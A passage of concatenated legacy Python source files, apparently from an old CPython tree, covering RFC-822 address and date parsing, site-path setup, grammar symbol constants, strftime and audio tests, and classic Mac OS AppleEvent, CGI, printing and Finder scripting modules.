else: atomlist.append(self.field[self.pos])
self.pos = self.pos + 1
return string.join(atomlist, '')
def getphraselist(self):
"""Parse a sequence of RFC-822 phrases.
A phrase is a sequence of words, which are in turn either
RFC-822 atoms or quoted-strings. Phrases are canonicalized
by squeezing all runs of continuous whitespace into one space.
"""
plist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS:
self.pos = self.pos + 1
elif self.field[self.pos] == '"':
plist.append(self.getquote())
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] in self.atomends:
break
else: plist.append(self.getatom())
return plist
class AddressList(AddrlistClass):
"""An AddressList encapsulates a list of parsed RFC822 addresses."""
def __init__(self, field):
AddrlistClass.__init__(self, field)
if field:
self.addresslist = self.getaddrlist()
else:
self.addresslist = []
def __len__(self):
return len(self.addresslist)
def __str__(self):
return string.joinfields(map(dump_address_pair, self.addresslist),", ")
def __add__(self, other):
# Set union
newaddr = AddressList(None)
newaddr.addresslist = self.addresslist[:]
for x in other.addresslist:
if not x in self.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __sub__(self, other):
# Set difference
newaddr = AddressList(None)
for x in self.addresslist:
if not x in other.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __getitem__(self, index):
# Make indexing, slices, and 'in' work
return self.addrlist[index]
def dump_address_pair(pair):
"""Dump a (name, address) pair in a canonicalized form."""
if pair[0]:
return '"' + pair[0] + '" <' + pair[1] + '>'
else:
return pair[1]
# Parse a date field
_monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',
'aug', 'sep', 'oct', 'nov', 'dec',
'january', 'february', 'march', 'april', 'may', 'june', 'july',
'august', 'september', 'october', 'november', 'december']
_daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']
# The timezone table does not include the military time zones defined
# in RFC822, other than Z. According to RFC1123, the description in
# RFC822 gets the signs wrong, so we can't rely on any such time
# zones. RFC1123 recommends that numeric timezone indicators be used
# instead of timezone names.
_timezones = {'UT':0, 'UTC':0, 'GMT':0, 'Z':0,
'AST': -400, 'ADT': -300, # Atlantic (used in Canada)
'EST': -500, 'EDT': -400, # Eastern
'CST': -600, 'CDT': -500, # Central
'MST': -700, 'MDT': -600, # Mountain
'PST': -800, 'PDT': -700 # Pacific
}
def parsedate_tz(data):
"""Convert a date string to a time tuple.
Accounts for military timezones.
"""
data = string.split(data)
if data[0][-1] in (',', '.') or string.lower(data[0]) in _daynames:
# There's a dayname here. Skip it
del data[0]
if len(data) == 3: # RFC 850 date, deprecated
stuff = string.split(data[0], '-')
if len(stuff) == 3:
data = stuff + data[1:]
if len(data) == 4:
s = data[3]
i = string.find(s, '+')
if i > 0:
data[3:] = [s[:i], s[i+1:]]
else:
data.append('') # Dummy tz
if len(data) < 5:
return None
data = data[:5]
[dd, mm, yy, tm, tz] = data
mm = string.lower(mm)
if not mm in _monthnames:
dd, mm = mm, string.lower(dd)
if not mm in _monthnames:
return None
mm = _monthnames.index(mm)+1
if dd[-1] == ',':
dd = dd[:-1]
i = string.find(yy, ':')
if i > 0:
yy, tm = tm, yy
if yy[-1] == ',':
yy = yy[:-1]
if yy[0] not in string.digits:
yy, tz = tz, yy
if tm[-1] == ',':
tm = tm[:-1]
tm = string.splitfields(tm, ':')
if len(tm) == 2:
[thh, tmm] = tm
tss = '0'
elif len(tm) == 3:
[thh, tmm, tss] = tm
else:
return None
try:
yy = string.atoi(yy)
dd = string.atoi(dd)
thh = string.atoi(thh)
tmm = string.atoi(tmm)
tss = string.atoi(tss)
except string.atoi_error:
return None
tzoffset=None
tz=string.upper(tz)
if _timezones.has_key(tz):
tzoffset=_timezones[tz]
else:
try:
tzoffset=string.atoi(tz)
except string.atoi_error:
pass
# Convert a timezone offset into seconds ; -0500 -> -18000
if tzoffset:
if tzoffset < 0:
tzsign = -1
tzoffset = -tzoffset
else:
tzsign = 1
tzoffset = tzsign * ( (tzoffset/100)*3600 + (tzoffset % 100)*60)
tuple = (yy, mm, dd, thh, tmm, tss, 0, 0, 0, tzoffset)
return tuple
def parsedate(data):
"""Convert a time string to a time tuple."""
t=parsedate_tz(data)
if type(t)==type( () ):
return t[:9]
else: return t
def mktime_tz(data):
"""Turn a 10-tuple as returned by parsedate_tz() into a UTC timestamp."""
if data[9] is None:
# No zone info, so localtime is better assumption than GMT
return time.mktime(data[:8] + (-1,))
else:
t = time.mktime(data[:8] + (0,))
return t - data[9] - time.timezone
# When used as script, run a small test program.
# The first command line argument must be a filename containing one
# message in RFC-822 format.
if __name__ == '__main__':
import sys, os
file = os.path.join(os.environ['HOME'], 'Mail/inbox/1')
if sys.argv[1:]: file = sys.argv[1]
f = open(file, 'r')
m = Message(f)
print 'From:', m.getaddr('from')
print 'To:', m.getaddrlist('to')
print 'Subject:', m.getheader('subject')
print 'Date:', m.getheader('date')
date = m.getdate_tz('date')
if date:
print 'ParsedDate:', time.asctime(date[:-1]),
hhmmss = date[-1]
hhmm, ss = divmod(hhmmss, 60)
hh, mm = divmod(hhmm, 60)
print "%+03d%02d" % (hh, mm),
if ss: print ".%02d" % ss,
print
else:
print 'ParsedDate:', None
m.rewindbody()
n = 0
while f.readline():
n = n + 1
print 'Lines:', n
print '-'*70
print 'len =', len(m)
if m.has_key('Date'): print 'Date =', m['Date']
if m.has_key('X-Nonsense'): pass
print 'keys =', m.keys()
print 'values =', m.values()
print 'items =', m.items()
```
#### File: cpython/Lib/site.py
```python
import sys, os
def addsitedir(sitedir):
if sitedir not in sys.path:
sys.path.append(sitedir) # Add path component
try:
names = os.listdir(sitedir)
except os.error:
return
names = map(os.path.normcase, names)
names.sort()
for name in names:
if name[-4:] == ".pth":
addpackage(sitedir, name)
def addpackage(sitedir, name):
fullname = os.path.join(sitedir, name)
try:
f = open(fullname)
except IOError:
return
while 1:
dir = f.readline()
if not dir:
break
if dir[0] == '#':
continue
if dir[-1] == '\n':
dir = dir[:-1]
dir = os.path.join(sitedir, dir)
if dir not in sys.path and os.path.exists(dir):
sys.path.append(dir)
prefixes = [sys.prefix]
if sys.exec_prefix != sys.prefix:
prefixes.append(sys.exec_prefix)
for prefix in prefixes:
if prefix:
if os.sep == '/':
sitedirs = [os.path.join(prefix,
"lib",
"python" + sys.version[:3],
"site-packages"),
os.path.join(prefix, "lib", "site-python")]
else:
sitedirs = [prefix]
for sitedir in sitedirs:
if os.path.isdir(sitedir):
addsitedir(sitedir)
# Define new built-ins 'quit' and 'exit'.
# These are simply strings that display a hint on how to exit.
if os.sep == ':':
exit = 'Use Cmd-Q to quit.'
elif os.sep == '\\':
exit = 'Use Ctrl-Z plus Return to exit.'
else:
exit = 'Use Ctrl-D (i.e. EOF) to exit.'
import __builtin__
__builtin__.quit = __builtin__.exit = exit
del exit
try:
import sitecustomize # Run arbitrary site specific code
except ImportError:
pass # No site customization module
def _test():
print "sys.path = ["
for dir in sys.path:
print " %s," % `dir`
print "]"
if __name__ == '__main__':
_test()
```
#### File: cpython/Lib/symbol.py
```python
single_input = 256
file_input = 257
eval_input = 258
funcdef = 259
parameters = 260
varargslist = 261
fpdef = 262
fplist = 263
stmt = 264
simple_stmt = 265
small_stmt = 266
expr_stmt = 267
print_stmt = 268
del_stmt = 269
pass_stmt = 270
flow_stmt = 271
break_stmt = 272
continue_stmt = 273
return_stmt = 274
raise_stmt = 275
import_stmt = 276
dotted_name = 277
global_stmt = 278
exec_stmt = 279
assert_stmt = 280
compound_stmt = 281
if_stmt = 282
while_stmt = 283
for_stmt = 284
try_stmt = 285
except_clause = 286
suite = 287
test = 288
and_test = 289
not_test = 290
comparison = 291
comp_op = 292
expr = 293
xor_expr = 294
and_expr = 295
shift_expr = 296
arith_expr = 297
term = 298
factor = 299
power = 300
atom = 301
lambdef = 302
trailer = 303
subscriptlist = 304
subscript = 305
sliceop = 306
exprlist = 307
testlist = 308
dictmaker = 309
classdef = 310
arglist = 311
argument = 312
#--end constants--
sym_name = {}
for _name, _value in globals().items():
if type(_value) is type(0):
sym_name[_value] = _name
def main():
import sys
import token
if len(sys.argv) == 1:
sys.argv = sys.argv + ["Include/graminit.h", "Lib/symbol.py"]
token.main()
if __name__ == "__main__":
main()
```
#### File: Lib/test/test_strftime.py
```python
import time, calendar, sys, string, os, re
from test_support import verbose
def main():
global verbose
now = time.time()
strftest(now)
verbose = 0
# Try a bunch of dates and times, chosen to vary through time of
# day and daylight saving time
for j in range(-5, 5):
for i in range(25):
strftest(now + (i + j*100)*23*3603)
def strftest(now):
if verbose:
print "strftime test for", time.ctime(now)
nowsecs = str(long(now))[:-1]
gmt = time.gmtime(now)
now = time.localtime(now)
if now[3] < 12: ampm='AM'
else: ampm='PM'
jan1 = time.localtime(time.mktime((now[0], 1, 1) + (0,)*6))
try:
if now[8]: tz = time.tzname[1]
else: tz = time.tzname[0]
except AttributeError:
tz = ''
if now[3] > 12: clock12 = now[3] - 12
elif now[3] > 0: clock12 = now[3]
else: clock12 = 12
expectations = (
('%a', calendar.day_abbr[now[6]], 'abbreviated weekday name'),
('%A', calendar.day_name[now[6]], 'full weekday name'),
('%b', calendar.month_abbr[now[1]], 'abbreviated month name'),
('%B', calendar.month_name[now[1]], 'full month name'),
# %c see below
('%d', '%02d' % now[2], 'day of month as number (00-31)'),
('%H', '%02d' % now[3], 'hour (00-23)'),
('%I', '%02d' % clock12, 'hour (01-12)'),
('%j', '%03d' % now[7], 'julian day (001-366)'),
('%m', '%02d' % now[1], 'month as number (01-12)'),
('%M', '%02d' % now[4], 'minute, (00-59)'),
('%p', ampm, 'AM or PM as appropriate'),
('%S', '%02d' % now[5], 'seconds of current time (00-60)'),
('%U', '%02d' % ((now[7] + jan1[6])/7),
'week number of the year (Sun 1st)'),
('%w', '0?%d' % ((1+now[6]) % 7), 'weekday as a number (Sun 1st)'),
('%W', '%02d' % ((now[7] + (jan1[6] - 1)%7)/7),
'week number of the year (Mon 1st)'),
# %x see below
('%X', '%02d:%02d:%02d' % (now[3], now[4], now[5]), '%H:%M:%S'),
('%y', '%02d' % (now[0]%100), 'year without century'),
('%Y', '%d' % now[0], 'year with century'),
# %Z see below
('%%', '%', 'single percent sign'),
)
nonstandard_expectations = (
# These are standard but don't have predictable output
('%c', fixasctime(time.asctime(now)), 'near-asctime() format'),
('%x', '%02d/%02d/%02d' % (now[1], now[2], (now[0]%100)),
'%m/%d/%y %H:%M:%S'),
('%Z', '%s' % tz, 'time zone name'),
# These are some platform specific extensions
('%D', '%02d/%02d/%02d' % (now[1], now[2], (now[0]%100)), 'mm/dd/yy'),
('%e', '%2d' % now[2], 'day of month as number, blank padded ( 0-31)'),
('%h', calendar.month_abbr[now[1]], 'abbreviated month name'),
('%k', '%2d' % now[3], 'hour, blank padded ( 0-23)'),
('%n', '\n', 'newline character'),
('%r', '%02d:%02d:%02d %s' % (clock12, now[4], now[5], ampm),
'%I:%M:%S %p'),
('%R', '%02d:%02d' % (now[3], now[4]), '%H:%M'),
('%s', nowsecs, 'seconds since the Epoch in UCT'),
('%t', '\t', 'tab character'),
('%T', '%02d:%02d:%02d' % (now[3], now[4], now[5]), '%H:%M:%S'),
('%3y', '%03d' % (now[0]%100),
'year without century rendered using fieldwidth'),
)
if verbose:
print "Strftime test, platform: %s, Python version: %s" % \
(sys.platform, string.split(sys.version)[0])
for e in expectations:
try:
result = time.strftime(e[0], now)
except ValueError, error:
print "Standard '%s' format gave error:" % e[0], error
continue
if re.match(e[1], result): continue
if not result or result[0] == '%':
print "Does not support standard '%s' format (%s)" % (e[0], e[2])
else:
print "Conflict for %s (%s):" % (e[0], e[2])
print " Expected %s, but got %s" % (e[1], result)
for e in nonstandard_expectations:
try:
result = time.strftime(e[0], now)
except ValueError, result:
if verbose:
print "Error for nonstandard '%s' format (%s): %s" % \
(e[0], e[2], str(result))
continue
if re.match(e[1], result):
if verbose:
print "Supports nonstandard '%s' format (%s)" % (e[0], e[2])
elif not result or result[0] == '%':
if verbose:
print "Does not appear to support '%s' format (%s)" % (e[0],
e[2])
else:
if verbose:
print "Conflict for nonstandard '%s' format (%s):" % (e[0],
e[2])
print " Expected %s, but got %s" % (e[1], result)
def fixasctime(s):
if s[8] == ' ':
s = s[:8] + '0' + s[9:]
return s
main()
```
#### File: Lib/test/test_sunaudiodev.py
```python
from test_support import verbose, findfile, TestFailed
import sunaudiodev
import os
def play_sound_file(path):
fp = open(path, 'r')
data = fp.read()
fp.close()
try:
a = sunaudiodev.open('w')
except sunaudiodev.error, msg:
raise TestFailed, msg
else:
a.write(data)
a.close()
def test():
play_sound_file(findfile('audiotest.au'))
test()
```
#### File: Contrib/PythonScript/getaete.py
```python
import baetools
import macpath
import sys
import os
import MacOS
import StringIO
import types
from MACFS import *
import macfs
import string
from Res import *
import struct
# for testing only
app ='CSOm' #'ezVu'# 'nwSP'#MACS'#
#Restrict the application suites to the dialect we want to use.
LANG = 0 # 0 = English, 1 = French, 11 = Japanese
lang = {0:'English', 1:'French', 11:'Japanese'}
#The following are neaded to open the application aete
kASAppleScriptSuite = 'ascr'
kGetAETE = 'gdte'
attributes = {}
arguments = {}
class AETE(baetools.TalkTo):
pass
def Getaete(app):
try:
data = openaete(app)
except MacOS.Error, msg:
if msg[0] == -609:
_launch(app)
data = openaete(app)
data = decode(data['----'].data)
data = compileaete(data)
return data
def decode(data):
"""Decode an aete into a python data structure"""
f = StringIO.StringIO(data)
aete = generic(getaete, f)
return aete
def simplify(item):
"""Recursively replace singleton tuples by their constituent item"""
if type(item) is types.ListType:
return map(simplify, item)
elif type(item) == types.TupleType and len(item) == 2:
return simplify(item[1])
else:
return item
## Here follows the aete resource decoder.
## It is presented bottom-up instead of top-down because there are direct
## references to the lower-level part-decoders from the high-level part-decoders.
#
def getflag(f, *args):
m = ''
c = f.read(2)
print `c`
if not c:
raise EOFError, 'in getflag' + str(args)
for n in c:
m = m + `ord(n)`
def getbyte(f, *args):
c = f.read(1)
if not c:
raise EOFError, 'in getbyte' + str(args)
return ord(c)
def getword(f, *args):
getalign(f)
s = f.read(2)
if len(s) < 2:
raise EOFError, 'in getword' + str(args)
return (ord(s[0])<<8) | ord(s[1])
def getlong(f, *args):
getalign(f)
s = f.read(4)
if len(s) < 4:
raise EOFError, 'in getlong' + str(args)
return (ord(s[0])<<24) | (ord(s[1])<<16) | (ord(s[2])<<8) | ord(s[3])
def getostype(f, *args):
getalign(f)
s = f.read(4)
if len(s) < 4:
raise EOFError, 'in getostype' + str(args)
return s
def getpstr(f, *args):
c = f.read(1)
if len(c) < 1:
raise EOFError, 'in getpstr[1]' + str(args)
nbytes = ord(c)
if nbytes == 0: return ''
s = f.read(nbytes)
if len(s) < nbytes:
raise EOFError, 'in getpstr[2]' + str(args)
return s
def getalign(f):
if f.tell() & 1:
c = f.read(1)
##if c <> '\0':
## print 'align:', `c`
def getlist(f, description, getitem):
count = getword(f)
list = []
for i in range(count):
list.append(generic(getitem, f))
getalign(f)
return list
def alt_generic(what, f, *args):
print "generic", `what`, args
res = vageneric(what, f, args)
print '->', `res`
return res
def generic(what, f, *args):
if type(what) == types.FunctionType:
return apply(what, (f,) + args)
if type(what) == types.ListType:
record = []
for thing in what:
item = apply(generic, thing[:1] + (f,) + thing[1:])
record.append(item)
return record
return "BAD GENERIC ARGS: %s" % `what`
getdata = [
(getostype, "type"),
(getpstr, "description"),
(getword, "flags")
]
getargument = [
(getpstr, "name"),
(getostype, "keyword"),
(getdata, "what")
]
getevent = [
(getpstr, "name"),
(getpstr, "description"),
(getostype, "suite code"),
(getostype, "event code"),
(getdata, "returns"),
(getdata, "accepts"),
(getlist, "optional arguments", getargument)
]
getproperty = [
(getpstr, "name"),
(getostype, "code"),
(getdata, "what")
]
getelement = [
(getostype, "type"),
(getlist, "keyform", getostype)
]
getclass = [
(getpstr, "name"),
(getostype, "class code"),
(getpstr, "description"),
(getlist, "properties", getproperty),
(getlist, "elements", getelement)
]
getcomparison = [
(getpstr, "operator name"),
(getostype, "operator ID"),
(getpstr, "operator comment"),
]
getenumerator = [
(getpstr, "enumerator name"),
(getostype, "enumerator ID"),
(getpstr, "enumerator comment")
]
getenumeration = [
(getostype, "enumeration ID"),
(getlist, "enumerator", getenumerator)
]
getsuite = [
(getpstr, "suite name"),
(getpstr, "suite description"),
(getostype, "suite ID"),
(getword, "suite level"),
(getword, "suite version"),
(getlist, "events", getevent),
(getlist, "classes", getclass),
(getlist, "comparisons", getcomparison),
(getlist, "enumerations", getenumeration)
]
getaete = [
(getbyte, "major version in BCD"),
(getbyte, "minor version in BCD"),
(getword, "language code"),
(getword, "script code"),
(getlist, "suites", getsuite)
]
def compileaete(aete):
"""Generate dictionary for a full aete resource."""
[major, minor, language, script, suites] = aete
suitedict = {}
gsuites = openaeut()
for gsuite in gsuites:
if gsuite[0] == 'AppleScript Suite':
suite = gsuite
suite = compilesuite(suite)
suitedict[identify(suite[0])] = suite[1:]
for suite in suites:
if language == LANG:
suitecode = suite[2]
if suite[5] == []:
for gsuite in gsuites:
if suitecode == gsuite[2]:
suite = gsuite
suite = compilesuite(suite)
suitedict[identify(suite[0])] = suite[1:]
suitedict = combinesuite(suitedict)
return suitedict
def compilesuite(suite):
"""Generate dictionary for a single suite"""
[name, desc, code, level, version, events, classes, comps, enums] = suite
eventdict ={}
classdict = {}
enumdict ={}
for event in events:
if event[6]:
for ev in event[6]:
ev[0] = identify(ev[:2])
eventdict[identify(event[:2])] = event[1:]
for klass in classes:
if klass[3]:
for kl in klass[3]:
kl[0] = identify(kl[:2])
classdict[identify(klass[:2])] = klass[1:]
for enum in enums:
enumdict[enum[0]] = enum[1]
return name, eventdict, classdict, enumdict
def combinesuite(suite):
"""Combines suite dictionaries to seperate event, class, enumeration dictionaries
"""
suitelist = []
eventDict ={}
classDict ={}
enumDict ={}
for value in suite.values():
for key in value[0].keys():
val = value[0][key]
eventDict[key] = val
for key in value[1].keys():
val = value[1][key]
if key in classDict.keys():
nval = classDict[key][2]
val[2] = val[2] + nval
classDict[key] = val
for key in value[2].keys():
val = value[2][key]
enumDict[key] = val
return eventDict, classDict, enumDict
illegal_ids = [ "for", "in", "from", "and", "or", "not", "print", "class", "return",
"def", "name", 'data' ]
def identify(str):
"""Turn any string into an identifier:
- replace space by _
- remove ',' and '-'
capitalise
"""
if not str[0]:
if str[1] == 'c@#!':
return "Every"
else:
return 'Any'
rv = string.replace(str[0], ' ', '_')
rv = string.replace(rv, '-', '')
rv = string.replace(rv, ',', '')
rv = string.capitalize(rv)
return rv
def openaete(app):
"""open and read the aete of the target application"""
arguments['----'] = LANG
_aete = AETE(app)
_reply, _arguments, _attributes = _aete.send(kASAppleScriptSuite, kGetAETE, arguments, attributes)
if _arguments.has_key('errn'):
raise baetools.Error, baetools.decodeerror(_arguments)
return _arguments
def openaeut():
"""Open and read a aeut file.
XXXXX This has been temporarily hard coded until a Python aeut is written XXXX"""
fullname = dialect
rf = OpenRFPerm(fullname, 0, 1)
try:
UseResFile(rf)
resources = []
for i in range(Count1Resources('aeut')):
res = Get1IndResource('aeut', 1+i)
resources.append(res)
for res in resources:
data = res.data
data = decode(data)[4]
finally:
CloseResFile(rf)
return data
def dialect():
"""find the correct Dialect file"""
dialect = lang[LANG] + " Dialect"
try:
##System 8
vRefNum, dirID = macfs.FindFolder(kOnSystemDisk, kScriptingAdditionsFolderType, 0)
fss = macfs.FSSpec((vRefNum, dirID, ''))
fss = fss.as_pathname()
except macfs.error:
##Sytem 7
vRefNum, dirID = macfs.FindFolder(kOnSystemDisk, kExtensionFolderType, 0)
fss = macfs.FSSpec((vRefNum, dirID, ''))
fss = fss.as_pathname()
fss = macpath.join(fss, "Scripting Additions")
fss = macpath.join(fss, "Dialect")
fss = macpath.join(fss, dialect)
return fss
#def openosax():
# """Open and read the aetes of osaxen in the scripting additions folder"""
#
# # System 7.x
# aete = []
# vRefNum, dirID = macfs.FindFolder(kOnSystemDisk, kExtensionFolderType, 0)
# fss = macfs.FSSpec((vRefNum, dirID, ''))
# fss = fss.as_pathname()
# osax = macpath.join(fss, "Scripting Additions")
# for file in os.listdir(osax):
# fullname = macpath.join(osax, file)
# print fullname
# rf = OpenRFPerm(fullname, 0, 1)
# try:
# UseResFile(rf)
# resources = []
# for i in range(Count1Resources('aete')):
# res = Get1IndResource('aete', 1+i)
# resources.append(res)
# for res in resources:
# data = res.data
# data = decode(data)[4]
# finally:
# CloseResFile(rf)
# aete.append(data)
# print data
#The following should be replaced by direct access to a python 'aeut'
def _launch(appfile):
"""Open a file thru the finder. Specify file by name or fsspec"""
# from PythonScript import PyScript
import baetypes
_finder = AETE('MACS')
parameters ={}
parameters['----'] = eval("baetypes.ObjectSpecifier('%s', '%s', %s)" % ('appf', 'ID ', `appfile`))
_reply, _arguments, _attributes = _finder.send( 'aevt', 'odoc', parameters , attributes = {})
if _arguments.has_key('errn'):
raise baetools.Error, baetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
if __name__ == '__main__':
# import profile
# profile.run('Getaete(app)', 'Getaeteprof')
Getaete(app)
# openosax()
# openaete('ascr')
# sys.exit(1)
```
#### File: Demo/cgi/realcgitest.py
```python
from MiniAEFrame import AEServer, MiniApplication
class CGITest(AEServer, MiniApplication):
def __init__(self):
MiniApplication.__init__(self)
AEServer.__init__(self)
self.installaehandler('aevt', 'oapp', self.open_app)
self.installaehandler('aevt', 'quit', self.quit)
self.installaehandler('WWW\275', 'sdoc', self.cgihandler)
oldparams = MacOS.SchedParams(0, 0)
self.mainloop()
apply(MacOS.SchedParams, oldparams)
def quit(self, **args):
self.quitting = 1
def open_app(self, **args):
pass
def cgihandler(self, pathargs, **args):
rv = """HTTP/1.0 200 OK
Server: NetPresenz; python-cgi-script
MIME-Version: 1.0
Content-type: text/html
<title>Python CGI-script results</title>
<h1>Python CGI-script results</h1>
<hr>
"""
rv = rv+'<br><b>Direct object:</b> %s\n'%pathargs
for key in args.keys():
if key[0] != '_':
rv = rv + '<br><b>%s:</b> %s\n'%(key, args[key])
rv = rv +'<hr>\nSee you next time!\n'
# Note: if you want to quit after each request enable the line
# self.quitting = 1
return rv
if __name__ == '__main__':
CGITest()
```
#### File: Demo/printing/PrintingDemo.py
```python
import Printing
import Qd
import Fm
import Res
# some constants
PostScriptBegin = 190 # Set driver state to PostScript
PostScriptEnd = 191 # Restore QuickDraw state
PostScriptHandle = 192 # PostScript data referenced in handle
CHUNK_SIZE = 0x8000 # max size of PicComment
def PostScript(text):
"""embed text as plain PostScript in print job."""
handle = Res.Resource('')
Qd.PicComment(PostScriptBegin, 0, handle)
while text:
chunk = text[:CHUNK_SIZE]
text = text[CHUNK_SIZE:]
handle.data = chunk
Qd.PicComment(PostScriptHandle, len(chunk), handle)
handle.data = ''
Qd.PicComment(PostScriptEnd, 0, handle)
# create a new print record
printrecord = Printing.NewTPrintRecord()
# open the printer
Printing.PrOpen()
try:
# initialize print record with default values
Printing.PrintDefault(printrecord)
# page setup, ok is 0 when user cancelled
ok = Printing.PrStlDialog(printrecord)
if not ok:
raise KeyboardInterrupt
# at this stage, you should save the print record in your document for later
# reference.
# print job dialog, ok is 0 when user cancelled
ok = Printing.PrJobDialog(printrecord)
if not ok:
raise KeyboardInterrupt
# once per document
port = Printing.PrOpenDoc(printrecord)
# port is the Printer's GrafPort, it is also the current port, so no need to Qd.SetPort(port)
try:
# start printing a page
# XXX should really look up what pages to print by
# inspecting the print record.
Printing.PrOpenPage(port, None)
try:
# use QuickDraw like in any other GrafPort
Qd.FrameRect((10, 250, 100, 500))
Qd.FrameRect((10, 510, 100, 600))
Qd.MoveTo(10, 100)
Qd.TextSize(50)
Qd.TextFont(Fm.GetFNum("Helvetica"))
Qd.DrawString("It rreally works!")
Qd.MoveTo(10, 150)
Qd.TextSize(20)
Qd.DrawString("(and now for a little PostScript...)")
# example PostScript code
ps = """
% the coordinate system is the quickdraw one, which is flipped
% compared to the default PS one. That means text will appear
% flipped when used directly from PostScript.
% As an example we start by defining a custom scalefont operator
% that corrects this.
/myscalefont{[exch 0 0 2 index neg 0 0]makefont}def
0.75 setgray
0 0 moveto
0 30 lineto 10000 30 lineto
10000 0 lineto closepath fill
0 setgray
5 25 moveto /Courier findfont 20 myscalefont setfont
(Printed with PostScript!) show
2 setlinewidth [10 10 5 10] 0 setdash 5 5 moveto 400 0 rlineto stroke
"""
# embed the PostScript code in the print job
PostScript(ps)
finally:
# when done with the page
Printing.PrClosePage(port)
finally:
# when done with the document
Printing.PrCloseDoc(port)
finally:
# when done printing
Printing.PrClose()
```
#### File: Lib/lib-scripting/Finder_7_0_Suite.py
```python
import aetools
import MacOS
_code = 'FNDR'
class Finder_7_0_Suite:
def open_about_box(self, _no_object=None, _attributes={}, **_arguments):
"""open about box: Open the 'About This Mac' window
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'aevt'
_subcode = 'abou'
if _arguments: raise TypeError, 'No optional args expected'
if _no_object != None: raise TypeError, 'No direct arg expected'
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_copy_to = {
'_from' : 'fsel',
}
def copy_to(self, _object, _attributes={}, **_arguments):
"""copy to: Copies one or more items into a folder
Required argument: Alias for folder into which the items are copied
Keyword argument _from: List of aliases for items to be copied
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'drag'
aetools.keysubst(_arguments, self._argmap_copy_to)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_duplicate = {
'items' : 'fsel',
}
def duplicate(self, _object, _attributes={}, **_arguments):
"""duplicate: Duplicate a set of items in a folder
Required argument: Alias for folder containing the items
Keyword argument items: List of aliases for items in the folder
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'sdup'
aetools.keysubst(_arguments, self._argmap_duplicate)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
def empty_trash(self, _no_object=None, _attributes={}, **_arguments):
"""empty trash: Empties the trash
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'empt'
if _arguments: raise TypeError, 'No optional args expected'
if _no_object != None: raise TypeError, 'No direct arg expected'
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_make_aliases_for = {
'items' : 'fsel',
}
def make_aliases_for(self, _object, _attributes={}, **_arguments):
"""make aliases for: Make aliases to items from a single folder
Required argument: Alias for folder containing the items
Keyword argument items: List of aliases for items in folder
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'sali'
aetools.keysubst(_arguments, self._argmap_make_aliases_for)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_move_to = {
'_from' : 'fsel',
}
def move_to(self, _object, _attributes={}, **_arguments):
"""move to: Move one or more items into a folder
Required argument: Alias for destination folder
Keyword argument _from: List of aliases for items to be moved
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'move'
aetools.keysubst(_arguments, self._argmap_move_to)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
def sleep(self, _no_object=None, _attributes={}, **_arguments):
"""sleep: Put portable into sleep mode
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'slep'
if _arguments: raise TypeError, 'No optional args expected'
if _no_object != None: raise TypeError, 'No direct arg expected'
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
def shut_down(self, _no_object=None, _attributes={}, **_arguments):
"""shut down: Shuts down the Macintosh if all applications can quit
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'shut'
if _arguments: raise TypeError, 'No optional args expected'
if _no_object != None: raise TypeError, 'No direct arg expected'
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_open = {
'items' : 'fsel',
}
def open(self, _object, _attributes={}, **_arguments):
"""open: Open folders, files, or applications from a given folder
Required argument: Alias for folder containing the items
Keyword argument items: List of aliases for items in the folder
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'sope'
aetools.keysubst(_arguments, self._argmap_open)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
